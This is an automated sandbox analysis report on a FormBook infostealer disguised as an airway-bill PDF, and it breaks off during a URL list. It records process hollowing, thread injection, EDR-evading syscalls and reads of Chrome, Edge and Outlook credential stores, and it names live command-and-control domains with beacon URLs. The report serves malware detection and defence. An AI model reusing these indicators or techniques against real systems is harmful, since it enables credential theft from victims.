                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\Public\Libraries\hdcleziT.pifSection loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifSection loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifSection loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: NULL target: C:\Users\Public\Libraries\hdcleziT.pif protection: execute and read and writeJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeSection loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\proquota.exeThread register set: target process: 5668Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\proquota.exeThread APC queued: target process: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeJump to behavior
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeSection unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFSection unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeMemory written: C:\Users\Public\Libraries\hdcleziT.pif base: 3E8008Jump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFMemory written: C:\Users\Public\Libraries\hdcleziT.pif base: 30C008Jump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFMemory written: C:\Users\Public\Libraries\hdcleziT.pif base: 3CB008Jump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pifJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exeProcess created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"Jump to behavior
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B25A78
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: GetLocaleInfoA,0_2_02B2A790
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: GetLocaleInfoA,0_2_02B2A744
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B25B84
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2918C GetLocalTime,0_2_02B2918C
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B2B70C GetVersionExA,0_2_02B2B70C
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\proquota.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		LSASS Memory1
                      System Network Connections Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Valid Accounts                      		2
                      Obfuscated Files or Information                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Access Token Manipulation                      		1
                      Software Packing                      		NTDS136
                      System Information Discovery                      		Distributed Component Object ModelInput Capture15
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
                      Process Injection                      		1
                      Timestomp                      		LSA Secrets321
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials2
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Valid Accounts                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                      Virtualization/Sandbox Evasion                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582317 Sample: Airway bill details - Deliv... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 68 www.techforcreators.live 2->68 70 www.marposet.shop 2->70 72 6 other IPs or domains 2->72 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 12 other signatures 2->86 10 Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe 1 10 2->10         started        15 Tizelcdh.PIF 5 2->15         started        17 Tizelcdh.PIF 5 2->17         started        signatures3 process4 dnsIp5 74 drive.google.com 142.250.186.174, 443, 49709, 49710 GOOGLEUS United States 10->74 76 drive.usercontent.google.com 172.217.16.193, 443, 49711 GOOGLEUS United States 10->76 54 C:\Users\Public\Libraries\hdcleziT.pif, PE32 10->54 dropped 56 C:\Users\Public\Libraries\Tizelcdh.PIF, PE32 10->56 dropped 58 C:\Users\Public\Tizelcdh.url, MS 10->58 dropped 60 2 other malicious files 10->60 dropped 104 Writes to foreign memory regions 10->104 106 Allocates memory in foreign processes 10->106 108 Sample uses process hollowing technique 10->108 19 hdcleziT.pif 10->19         started        22 cmd.exe 1 10->22         started        110 Multi AV Scanner detection for dropped file 15->110 112 Sample is not signed and drops a device driver 15->112 24 hdcleziT.pif 15->24         started        26 cmd.exe 15->26         started        28 cmd.exe 1 17->28         started        30 hdcleziT.pif 17->30         started        file6 signatures7 process8 signatures9 88 Detected unpacking (changes PE section rights) 19->88 90 Maps a DLL or memory area into another process 19->90 32 WQzLddwiZR.exe 19->32 injected 34 conhost.exe 22->34         started        36 WQzLddwiZR.exe 24->36 injected 39 conhost.exe 26->39         started        41 conhost.exe 28->41         started        process10 signatures11 43 proquota.exe 13 32->43         started        92 Maps a DLL or memory area into another process 36->92 94 Found direct / indirect Syscall (likely to bypass EDR) 36->94 46 proquota.exe 36->46         started        process12 signatures13 96 Tries to steal Mail credentials (via file / registry access) 43->96 98 Tries to harvest and steal browser information (history, passwords, etc) 43->98 100 Modifies the context of a thread in another process (thread injection) 43->100 102 3 other signatures 43->102 48 WQzLddwiZR.exe 43->48 injected 52 firefox.exe 43->52         started        process14 dnsIp15 62 missvet.net 108.179.193.23, 49993, 49994, 49995 UNIFIEDLAYER-AS-1US United States 48->62 64 www.marposet.shop 188.114.97.3, 49987, 80 CLOUDFLARENETUS European Union 48->64 66 www.techforcreators.live 52.223.13.41, 49988, 49989, 49990 AMAZONEXPANSIONGB United States 48->66 78 Found direct / indirect Syscall (likely to bypass EDR) 48->78 signatures16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe26%ReversingLabsWin32.Trojan.Generic
                      Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe33%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Tizelcdh.PIF26%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Libraries\hdcleziT.pif3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://marposet.shop/0%Avira URL Cloudsafe
                      http://www.techforcreators.live/6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV0%Avira URL Cloudsafe
                      http://www.techforcreators.live/6rby/0%Avira URL Cloudsafe
                      http://www.missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30=0%Avira URL Cloudsafe
                      http://www.missvet.net/htux/0%Avira URL Cloudsafe
                      http://www.missvet.net0%Avira URL Cloudsafe
                      http://www.marposet.shop/i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0=0%Avira URL Cloudsafe
                      http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.marposet.shop
                      		188.114.97.3
                      		truetrue
                        		unknown
                        www.techforcreators.live
                        		52.223.13.41
                        		truetrue
                          		unknown
                          drive.google.com
                          		142.250.186.174
                          		truefalse
                            		high
                            drive.usercontent.google.com
                            		172.217.16.193
                            		truefalse
                              		high
                              missvet.net
                              		108.179.193.23
                              		truetrue
                                		unknown
                                www.missvet.net
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.bellhomehd.shop
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.einpisalpace.shop
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.techforcreators.live/6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQVtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.marposet.shop/i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.techforcreators.live/6rby/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.missvet.net/htux/true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabproquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/ch2sh/BatCloakcmd.exe, 00000009.00000002.2427580879.0000000003111000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://sectigo.com/CPS0Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 